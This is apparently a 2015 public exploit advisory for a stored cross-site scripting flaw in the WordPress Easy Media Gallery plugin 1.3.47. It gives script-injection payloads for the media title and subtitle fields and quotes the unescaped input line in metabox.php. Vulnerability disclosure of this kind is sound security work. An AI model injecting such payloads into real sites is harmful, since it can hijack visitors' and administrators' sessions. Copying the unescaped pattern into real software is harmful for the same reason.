<!--
# Exploit Title: Wordpress Easy Media Gallery Stored XSS
# Date: 2015/9/05
# Exploit Author: Arash Khazaei
# Vendor Homepage: https://wordpress.org/plugins/easy-media-gallery/
# Software Link: https://downloads.wordpress.org/plugin/easy-media-gallery.1.3.47.zip
# Version: 1.3.47
# Tested on: Windows , Mozilla FireFox
# CVE : N/A
# Contact : twitter.com/Sec4U1
# Email : info@sec4u.net
# Site : http://sec4u.net

# Intrduction : 

# Wordpress Easy Media Gallery Plugin Have 10,000+ Active Install 
# And Suffer From A Stored XSS Vulnerability In Media Title & In Media Subtitle Sections.
# Authors , Editors And Of Course Administrators Can Use This Vulnerability To Harm WebSite .

  -->
Exploit : 

For Exploiting This Vulnerability Install Easy Media Gallery Plugin 
Then Create New Media In Media Title Input : "/><script>alert('Exploit')</script>
Then In Media Subtitle Like Media Title Input : "/><script>alert('Exploit1')</script>
After Creating New JavaScript Code Will Be Executed .

Video Poc : 

http://youtu.be/5nMQUgP6nD4

  
Vulnerable Code in include/metabox.php [478]: 

<input type="text" name="easmedia_meta['. $field['id'] .']" id="'. $field['id'] .'" value="'. ($meta ? $meta : $field['std']) .'" size="30" />



<!-- Discovered By Arash Khazaei (Aka JunkyBoy) -->